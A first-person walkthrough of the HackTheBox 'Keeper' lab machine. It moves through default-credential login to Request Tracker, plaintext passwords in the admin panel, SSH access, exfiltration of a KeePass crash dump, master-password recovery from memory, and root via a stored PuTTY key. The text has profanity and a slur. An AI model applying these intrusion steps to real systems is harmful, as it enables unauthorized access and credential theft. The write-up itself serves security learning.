HackTheBox: Keeper


Im doing this one as soon as it releases, so it will be seasonal. Hopefully Ill be able to finish it today.

This will be fun; this is the first box Ive ever attempted that was BRAND NEW, with no writeups or answers out there at all. Let's see how it goes.


Only two ports open: 1) SSH on 22 2) HTTP on 80

The HTTP service is using nginx. It appears from script scan that the system is Ubuntu

Visiting the web page in the browser, we are prompted to manually redirect to "tickets.keeper.htb". So we'll go ahead and add "keeper.htb" and "tickets.keeper.htb" to /etc/hosts.

It appears to be a login page for a request ticket system. The software appears to be "Best Practical", version 4.4.4+dfsg.

All we have is a login page, and there does not appear to be an account creation option.

Let's do a quick search for vulnerabilities on google. Ill run gobuster in the background. Note on this: I had to use --exclude-length 0 to get this to run properly, as non-existent searches would still yield a 302 status with length 0. Rather than filter out 302s I decided to just filter out 0 length entries. This is already catching a few strange entries.

No obvious vulnerabilities showed up on google, and nothing on serachsploit.

/rtop directory

Navigating http://tickets.keeper.htb/rtop as spotted by gobuster, we get an error message

An internal RT error has occurred. Your administrator can find more details in RT's log files.

What is RT? What does this mean? It has something to do with the ticket support system "Best Practical"; just by coincidence a message about RT popped up on their home page as I glanced at it. Oh okay: its just "Request Tracker."

Getting in to the RT app

Wow... the default creds let me sign in, =="root:password"==. That's hilarious.

I actually tried that once and it failed, guess I typed "password" wrong... glad I tried it again.

There's not a ton to sift through on this page. It's basically a control panel for viewing and creating tickets.

There's one open ticket, titled "Issue with Keepass Client on Windows" from webmaster@keeper.htb. This also gives us the name of the webmaster: ==# User: lnorgaard (Lise Nørgaard)==.

The site may be vulnerable to IDORs for enumerating users via the 'id' param: http://tickets.keeper.htb/rt/User/Summary.html?id=14 But I may not need to do that anyway. As root, I may be able to just view all users.


In the ticket we have the following:

Attached to this ticket is a crash dump of the keepass program. Do I need to update the version of the program first...?  

However, I don't actually see the attached crash dump. We do have the following at the bottom of the ticket page:

I have saved the file to my home directory and removed the attachment for security reasons.  
Once my investigation of the crash dump is complete, I will let you know.

Hmm. Are we able to view her home directory through the web page?

Well actually, lets first just try to SSH in as lise/inorgaard and guess at some potential passwords... no luck there.

Before trying to access her home directory through the web app, let me just take a quick look at what tools we are able to use on the site. There's an 'admin' tab

If I try to search 'assets' for anything belonging to Inorgaard, I get an interesting message:

# Possible cross-site request forgery

RT has detected a possible **cross-site request forgery** for this request, because the Referrer header supplied by your browser (tickets.keeper.htb:80) is not allowed by RT's configured hostname (keeper.htb:80). A malicious attacker may be trying to **modify or access a search** on your behalf. If you did not initiate this request, then you should alert your security team.

If you really intended to visit http://keeper.htb/rt/Asset/Search/index.html and modify or access a search, then **[click here to resume your request](http://keeper.htb/rt/Asset/Search/index.html?CSRF_Token=2244c57a9d8eddd3d96b96162bc4ec97)**.

I dont think this would be very useful though since we already have privileged user creds.

Lets explore the 'admin' tab. Apparently here we can view all user's passwords... Inorgaard's is set to "Welcome2023". Try SSH in as her again? No luck.

Okay, so it looks like the 'admin'-->'tools'-->'system configuration' page is a goldmine. It has info about where the machine itself is installed, it looks like.

Skimming through this we also have some info about the database:

Database port 3306
Database name rtdb
Database admin 'postgres'
Database type 'mysql'
database user 'rtuser'

SSH'ing in successfully as Lise Norgaard

Wow, I'm retarded. I thought the one user's name was "Lisa Inorgaard", but its actually just "Lisa Norgaard", and her username is "lnorgaard" with an 'L'. This whole time I thought it was 'Inorgaard' with an i. Fuck.

Anyway, once I realized that, I successfully SSH'd in using =="lnorgaard:Welcome2023!"==, which are the same creds as on the site.

Damn, that was easy.

The SSH login prompt caught my eye:

You have mail.
Last login: Sat Aug 12 22:08:27 2023 from

I have mail. Im not making the same mistake I made last time of misreading the file as en empty directory. Let me check it out. Okay, it looks like the mail is just a copy of the support ticket from the site. Which reminds me, I should be able to view that crash log now.

First though, it looks like I might be inside a container, or maybe there's weird permissions set. 'w' doesnt show anyone online despite being SSH'd in, and ps aux only has a few lines and no init.

Anyway, back to the KeePass stuff. We have a zip file of the dump in her directory:

lnorgaard@keeper:~$ ls
RT30000.zip  user.txt

I exfiltrated it using a python simple http server:

lnorgaard@keeper:~$ python3 -m http.server 1234

Then I unzipped the file on my machine revealing the following contents:

KeePassDumpFull.dmp passcodes.kdbx

Okay. Let's see what we can do with these.

Investigating the dump file and keepass DB

I tried fruitlessly to figure this out myself for about an hour. Essentially, given that this is a CTF, it looks like what I have to do is scan the mini dump (basically a program memory dump proceding a crash) for the master key to unlock the keepass database.

I just found this post online, which seems to have been made at the same time as this box: https://www.bleepingcomputer.com/news/security/keepass-exploit-helps-retrieve-cleartext-master-password-fix-coming-soon/

This tool worked (required fuckery with .NET install though); it found a potential password, though it had "holes" in it in the sense that it wasnt able to ascertain every character.

It was able to resolve the password to:

Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de

I thought it had just given me junk, but i copy+pasted "dgrd med flde" into google and got a result for "rødgrød med fløde", a Danish recipe.

I copy and pasted this (WITH the special characters) into the password field of kpcli (a keepass db client), and it fucking worked!!!

$ kpcli --kdb=passcodes.kdbx
Provide the master password: (Rødgrød med fløde)

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===


Now I was able to skim through and find the 'keeper' network passwords:

kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)                                          
1. Ticketing System                                                       
kpcli:/passcodes/Network> show 0

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       Private-Lines: 14
       Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

So it looks like we have an RSA key for root, in PuTTY format.

We can convert the key to OpenSSH format using the command

$ puttygen putty_key -O private-openssh -o id_rsa

And then ssh into the server using that key:

$ ssh -i ./id_rsa root@              
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Sun Aug 13 02:21:28 2023 from